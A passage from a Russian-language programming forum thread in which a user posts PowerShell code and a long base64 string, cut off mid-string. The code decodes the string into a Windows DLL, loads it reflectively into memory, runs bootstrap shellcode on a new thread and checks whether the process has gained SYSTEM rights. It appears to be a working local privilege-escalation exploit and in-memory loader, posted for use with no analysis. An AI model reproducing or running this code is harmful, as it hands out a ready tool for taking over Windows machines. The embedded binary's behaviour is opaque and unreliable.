    if ($Bootsrap.Length -gt $BOOTSTRAP_MAX_LENGTH)
    {
      Throw "Bootstrap shellcode size greater than $BOOTSTRAP_MAX_LENGTH!"
    }
    #
    $TargetPid = 0 #current proc
    Copy-ToUnmanagedMem ($BootstrapAddr - $UserDataSize -  1) ([BitConverter]::GetBytes($TargetPid)) 0 $
UserDataSize
    
    
    Copy-ToUnmanagedMem $BootstrapAddr $Bootsrap 0 $Bootsrap.Length
    if ($DEBUG)
    {
      "0x{0:X0}" -f ($BootstrapAddr) | Write-Host
    }
    #
    $ThreadHandle = $Win32Funcs.CreateThread.Invoke([IntPtr]::Zero, 0, $BootstrapAddr, 0, 0, [IntPtr]::Z
ero)
    if ($ThreadHandle -eq [IntPtr]::Zero)
    {
      Throw "Unable to launch thread!"
    }
    ## Wait for shellcode thread to terminate
    if ($Win32Funcs.WaitForSingleObject.Invoke($ThreadHandle, $THREAD_WAIT_TIME) -eq $Win32Const.WAIT_TI
MEOUT)
    {
      $Win32Funcs.TerminateThread.Invoke($ThreadHandle, 1)
    }
    #
    if ($CHILD_PROC_TO_KILL)
    {
      if ((Gwmi Win32_Process -Filter "Name LIKE '$CHILD_PROC_TO_KILL%'").parentprocessid -eq $PID)
      {
        Stop-Process -Force -Name $CHILD_PROC_TO_KILL
      }
    }
    #
    if ([System.Security.Principal.WindowsIdentity]::GetCurrent().IsSystem -eq $False)
    {
      $Win32Funcs.VirtualFree.Invoke($PEHandle, $AllocatedMemSize, $Win32Const.MEM_RELEASE) | Out-Null
    }
  #
  }
  catch
  {
    Write-Host $Error[0].InvocationInfo.PositionMessage, "`n$($Error[0])"
    return $False
  }
  if ($DEBUG)
  {
    Write-Host 'Press any key...'
    $x = $host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")
  }
  return [System.Security.Principal.WindowsIdentity]::GetCurrent().IsSystem
}
#Example of usage
 
$enc = [system.Text.Encoding]::UTF8 
$b64earr = $enc.GetBytes($strexp) 
$arrexp = Base64DecodeByteArr $b64earr
TryElevIRDI "?" "?" "ElevProcess"
0
bliver
1 / 1 / 0
Регистрация: 15.08.2017
Сообщений: 13
04.12.2017, 18:49  [ТС] 8
и сама строка strexp
Bash
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
$strexp = "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
